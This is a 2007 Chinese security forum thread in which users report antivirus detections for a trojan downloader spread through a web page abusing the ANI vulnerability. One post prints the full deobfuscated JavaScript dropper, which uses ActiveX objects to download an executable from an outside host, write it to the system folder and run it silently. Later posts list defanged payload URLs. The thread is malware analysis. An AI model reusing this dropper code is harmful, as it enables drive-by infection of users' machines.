收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 请高手分析此马(最新利用ANI漏洞):http://mm.987999. ...
123下一页
返回列表 发新帖
楼主: sisiya591
 收起左侧

请高手分析此马(最新利用ANI漏洞):http://mm.987999.com/23.htm

[复制链接]
wangjay1980
发表于 2007-7-19 16:26:46 | 显示全部楼层
detected: virus Trojan.Generic (modification)        File: C:\Documents and Settings\Owner\×ÀÃæ\2.rar/2\soft.exe//UPack
detected: virus Trojan.Generic (modification)        File: C:\Documents and Settings\Owner\×ÀÃæ\2.rar/2\51.exe//UPack
回复

举报

taitan001
发表于 2007-7-19 16:28:07 | 显示全部楼层

vt上怎么显示卡巴是4.0啊
难怪查不到
Kaspersky 4.0.2.24 2007.07.19 no virus found
回复

举报

周杰伦
发表于 2007-7-19 16:28:10 | 显示全部楼层
Found a virus or unwanted program 'TR/Dldr.Age.24324.A' [trojan]
in file 'F:\病毒样本\2.rar'.
Action taken:
The file was deleted!
回复

举报

风雪
发表于 2007-7-19 16:29:16 | 显示全部楼层
1184833571,2007-7-19 16:26:11,Heuri.Possible/Packed,启发式扫描,mygood,D:\3\新建文件夹\新建文件夹\2\51.exe,Manual scan
1184833571,2007-7-19 16:26:11,Heuri.Possible/Packed,启发式扫描,mygood,D:\3\新建文件夹\新建文件夹\2\soft.exe,Manual scan
费尔
回复

举报

1688388728
发表于 2007-7-19 16:30:57 | 显示全部楼层
Kaspersky Internet Security 7.0
The requested URL http://bbs.kafan.cn/attachment.php?aid=102639 is infected with Trojan.Generic virus
回复

举报

lovewei
发表于 2007-7-19 16:48:23 | 显示全部楼层
请问7楼的,我解出来是这样的:
function HJAakes(slKsm1){var LhzSWS2 = window["Math"]["random"]()*slKsm1;return window["Math"]["round"](LhzSWS2)+'.exe';
}
var psfsrGko3;
dab="Mi"
var ysJz$T4;
dab2="cr"
ysJz$T4=window["document"]
var XvDrlaU5="object"
psfsrGko3=ysJz$T4["createElement"]("object");
dab4="oso"
dab3="ft"+"."
dab5="XMLHTTP"
dirka="clsid"+""
dirbao=":BD9"+"6C"+"556"+"-"+"6"+"5A3-11"+"D0-9"+"83A"+"-"+"00C04F"+"C2"+"9E36"
psfsrGko3["setAttribute"]("classid",dirka+dirbao);
dab6=dab+dab2+dab4
dab7=dab3+dab5
dab8=dab6+dab7
sb="Ad"
sb3="Stream"
sb2="odb."
var CDhOS6;
sb4=sb+sb2+sb3
CDhOS6=psfsrGko3["CreateObject"](dab8,"");
var hljdKrnz7;
dingcao="ET"
hljdKrnz7=psfsrGko3["CreateObject"](sb4,"");
ding="G"
caoruixing2="e"
erbirui="Sc"
JyeHaeewe=HJAakes(300);
erbirui3="ri"
erbirui5="pti"
caonima2="ng.Fi"
caoruixing4="ppl"
caoruixing5="ication"
caotama2="leSy"
hljdKrnz7["type"]=1;
nimagei="stemObject"
var o8=psfsrGko3["CreateObject"](erbirui+erbirui3+erbirui5+caonima2+caotama2+nimagei,"");
var stygDP9=o8["GetSpecialFolder"](0);
CDhOS6["open"](ding+dingcao, 'http://mm.987999.com/soft.exe',0);
var kaYoaYQD10;
CDhOS6["send"]();
kaYoaYQD10=o8["BuildPath"](stygDP9,"sys"+JyeHaeewe);
JyeHaeewe= o8["BuildPath"](stygDP9,JyeHaeewe);
caoruixing="Sh"
caoruixing3="ll.A"
hljdKrnz7["Open"]();
caoruixing6=caoruixing+caoruixing2+caoruixing3
caoruixing7=caoruixing4+caoruixing5
var zvfJsK11=psfsrGko3["CreateObject"](caoruixing6+caoruixing7,"");
hljdKrnz7["Write"](CDhOS6["responseBody"]);
hljdKrnz7["SaveToFile"](JyeHaeewe,2);
o8["MoveFile"](JyeHaeewe,kaYoaYQD10);
hljdKrnz7["Close"]();
guanbi="op"
var Q12=o8["BuildPath"](stygDP9+'\\system32','cmd.exe')
guanbi2="e"+"n"
var zqY13=' /c '+kaYoaYQD10
psfsrGko3["CreateObject"](caoruixing6+caoruixing7,"")
["sHeLlexEcUtE"](Q12,zqY13,"",guanbi+guanbi2,0);

就是说只有那个soft.exe,你解出来的那个51.exe怎么搞出来的
回复

举报

promised
发表于 2007-7-19 16:50:42 | 显示全部楼层

回复 #16 lovewei 的帖子

我解出来也是如此
他好像不是用解的

[ 本帖最后由 promised 于 2007-7-19 16:52 编辑 ]
回复

举报

lovewei
发表于 2007-7-19 17:00:38 | 显示全部楼层
其实这是个老的下载者,只是免杀了而已的,下载:
hxxp://web.freewebhtm.com/soft/1.exe
hxxp://web.freewebhtm.com/soft/2.exe
hxxp://web.freewebhtm.com/soft/3.exe
hxxp://web.freewebhtm.com/soft/4.exe
hxxp://web.freewebhtm.com/soft/5.exe
hxxp://web.freewebhtm.com/soft/6.exe
hxxp://web.freewebhtm.com/soft/7.exe
hxxp://web.freewebhtm.com/soft/8.exe
hxxp://web.freewebhtm.com/soft/9.exe
hxxp://web.freewebhtm.com/soft/a.exe
hxxp://web.freewebhtm.com/soft/b.exe
hxxp://web.freewebhtm.com/soft/c.exe
hxxp://web.freewebhtm.com/soft/d.exe
hxxp://web.freewebhtm.com/soft/e.exe
hxxp://web.freewebhtm.com/soft/f.exe
hxxp://web.freewebhtm.com/soft/g.exe
hxxp://web.freewebhtm.com/web/123.txt
详细分析参见阳光http://hi.baidu.com/newcenturysun/blog/item/2ad3d7ceb63d960192457e96.html
回复

举报

Giggs
发表于 2007-7-19 17:03:42 | 显示全部楼层
Start of the scan: 2007年7月19日  17:03

Starting the file scan:

Begin scan in 'C:\Documents and Settings\Administrator\桌面\2.rar'
C:\Documents and Settings\Administrator\桌面\2.rar
  [0] Archive type: RAR
  --> 2\soft.exe
      [DETECTION] Is the Trojan horse TR/Dldr.Age.24324.A
  --> 2\51.exe
      [DETECTION] Is the Trojan horse TR/Dldr.Age.24324.A
      [INFO]      A backup was created as '4711290a.qua'  ( QUARANTINE )
      [INFO]      The file was deleted!
回复

举报

moonsilver
发表于 2007-7-19 17:44:00 | 显示全部楼层
尊敬的客户,您好!
    您的邮件已经收到,感谢您对瑞星的支持。

    我们已经详细分析过您的问题和文件,以下是您上传的文件的分析结果:
    1.文件名:51.exe
    病毒名:Worm.Win32.Delf.yst

    2.文件名:soft.exe
    病毒名:Worm.Win32.Delf.yst

    您所上报的病毒文件将在19.32.41版本中处理解决。

注意:如果您上报的文件损坏或者压缩包有密码保护,会导致我们无法正确分析,请您确认文件正常且压缩包中无密码后再提交。
如有问题,您可以通邮件服务中心与我们联系,详细描述您的问题,并且提供此封邮件主题中的流水单号以及上报所用的电子邮件地址。
提 醒:为保证收到您的来信,请勿直接回复本邮件!!!
-------------------------------------------------------------
发送邮件:请用IE等浏览器访问网址 http://csc.rising.com.cn
-------------------------------------------------------------
回复

举报

下一页 »
123下一页
返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-5-17 14:42 , Processed in 0.110006 second(s), 15 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表